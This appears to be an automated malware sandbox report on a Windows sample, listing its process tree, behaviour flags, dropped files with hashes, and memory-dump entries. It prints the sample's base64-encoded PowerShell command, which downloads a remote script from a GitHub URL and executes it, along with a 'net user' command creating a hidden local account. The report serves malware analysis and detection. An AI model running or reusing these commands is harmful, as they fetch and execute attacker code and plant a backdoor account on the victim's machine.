C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES7610.tmpMD5
e39694504347d92921c0f151f7cb60fd
SHA127b54cb0b4d860cc82d30a04548998a067d1a67f
SHA256ab2a7187619f89cc0be45d16fdf55806b415c9ea44bf7094fd05d67f4d88f206
SHA5127f9f7fb7e19c1c864854f9a8320385d63de45addefe333f2e36a62b825e0cacdc4c9f18cdb2d27225f125b121dcdfbad4fa0aae1462944f21e0992bb6ec319f5
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
bcac3bbb18f093dbc8e5e76d2675695f
SHA196453f65b41e428937349e6f48fe67d6dfd6a580
SHA256b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a
SHA51278c55502c7d0484b458fadb78bc075b8eda01b794e2037283df11dc58105bd632c0e747e92fd7aac7b79c5ac0ddce9bb2c6e7ce158c743c9f080a52eda0498ab
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
42c2a160d2d191e6ffcc1076b4734ee2
SHA1c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49
SHA2562b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99
SHA5123b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939
-
C:\Users\Admin\AppData\Local\Temp\te0yl3oh\te0yl3oh.dllMD5
33e7541dc0edf88a1fe73fac8a57513c
SHA12fe94b19917fddfe97ea320db0dbb3f48ebf87f7
SHA25679f503b57b337362cb9602d503afd5e22d28092bcfdd06234e91f6d2219b8818
SHA51238a20beca2d6c6b2b9df2fe7f3bb63a12434aac400fce3f419cf3e35f2dc7daf79df0f1f5218b332a2b8a36383e2f0ad631c913e030c05471708cc68d63b61e5
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\te0yl3oh\CSC527D92C168E4A1DAD338944CE31F98.TMPMD5
7f6f33a4e8c61faa84841eb5ea91684a
SHA1665cf59a5d168c1abfa507f87daffd18ebffc6ea
SHA25639e4ba4b830af9d5c4c18bab2c3143a11a011beb8e5584fe22f65e293438e954
SHA51218e471739dfedc66c75de08762d8c2ed4f1578e04e23d770db7ba162a7a6b334dc503b4eb1a6a139bce61f81a268255c37f2d808f3a6f460e4e8c35478f9f188
-
\??\c:\Users\Admin\AppData\Local\Temp\te0yl3oh\te0yl3oh.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\te0yl3oh\te0yl3oh.cmdlineMD5
d6ee414daaed0742426b787264ebca78
SHA1d4bf91e74de4bea2f67cd3aabc7da66da7328a3c
SHA25635fc60b270395829c492963a32e7885a7f30c23d2d2adb4465bbc9cf2ac5f8c6
SHA51257abd26919ad73ca9c2d1096fc4e987ec1ab76c75b380cb834d1fd72d1057b8fb72f26596dd1058b9fe0bba2019a4d06e9ee50e40191bc5e64b71879966cb701
-
\Windows\Branding\mediasrv.pngMD5
f357d4e7b83bc0a41c65d97f3e6f50f4
SHA171db3180a8ada6d5d7722c54a5940c3490f78636
SHA256db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba
SHA512566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e
-
\Windows\Branding\mediasvc.pngMD5
d5de6f599d9807bac2f5a8e751a8c38f
SHA19e70edf56b6a5768fda84232e9c557e750d3631b
SHA25618207938b456352ad540ed62fb113b7b11025a6d2b1de08728772c24c8553fca
SHA512e526e3a75be31762bb5fc01f4450ff48391fe36a1e71aef6a89d3f262e523e2f7654501f43667a3e982a05835418e72ae26ec3ba955b8537a700e69e82337fc5
-
memory/200-19-0x0000000000000000-mapping.dmp
-
memory/204-20-0x0000000000000000-mapping.dmp
-
memory/212-42-0x0000000000000000-mapping.dmp
-
memory/508-27-0x0000000000000000-mapping.dmp
-
memory/560-51-0x0000000000000000-mapping.dmp
-
memory/696-34-0x0000000000000000-mapping.dmp
-
memory/696-18-0x0000000000000000-mapping.dmp
-
memory/752-26-0x0000000000000000-mapping.dmp
-
memory/756-53-0x0000000000000000-mapping.dmp
-
memory/904-37-0x0000000000000000-mapping.dmp
-
memory/1444-25-0x0000000000000000-mapping.dmp
-
memory/1544-33-0x0000000000000000-mapping.dmp
-
memory/1720-15-0x0000000000000000-mapping.dmp
-
memory/2100-30-0x0000000000000000-mapping.dmp
-
memory/2176-16-0x0000000000000000-mapping.dmp
-
memory/2188-32-0x0000000000000000-mapping.dmp
-
memory/2192-43-0x0000000000000000-mapping.dmp
-
memory/2212-45-0x0000000000000000-mapping.dmp
-
memory/2268-39-0x0000000000000000-mapping.dmp
-
memory/2348-22-0x0000000000000000-mapping.dmp
-
memory/2484-17-0x0000000000000000-mapping.dmp
-
memory/2576-21-0x0000000000000000-mapping.dmp
-
memory/2644-54-0x0000000000000000-mapping.dmp
-
memory/2712-41-0x0000000000000000-mapping.dmp
-
memory/2992-40-0x0000000000000000-mapping.dmp
-
memory/3024-2-0x0000000000000000-mapping.dmp
-
memory/3024-3-0x00007FFFCE9A0000-0x00007FFFCF38C000-memory.dmpFilesize
9.9MB
-
memory/3024-14-0x000001D998010000-0x000001D998011000-memory.dmpFilesize
4KB
-
memory/3024-4-0x000001D9FD0B0000-0x000001D9FD0B1000-memory.dmpFilesize
4KB
-
memory/3024-5-0x000001D9FF350000-0x000001D9FF351000-memory.dmpFilesize
4KB
-
memory/3048-31-0x0000000000000000-mapping.dmp
-
memory/3076-35-0x0000000000000000-mapping.dmp
-
memory/3180-46-0x0000000000000000-mapping.dmp
-
memory/3180-47-0x00007FFFCE9A0000-0x00007FFFCF38C000-memory.dmpFilesize
9.9MB
-
memory/3548-24-0x0000000000000000-mapping.dmp
-
memory/3632-52-0x0000000000000000-mapping.dmp
-
memory/3648-23-0x0000000000000000-mapping.dmp
-
memory/3788-38-0x0000000000000000-mapping.dmp
-
memory/3996-44-0x0000000000000000-mapping.dmp
-
memory/4000-10-0x0000000000000000-mapping.dmp
-
memory/4068-7-0x0000000000000000-mapping.dmp
-
memory/4076-1-0x00000000029E0000-0x00000000029E1000-memory.dmpFilesize
4KB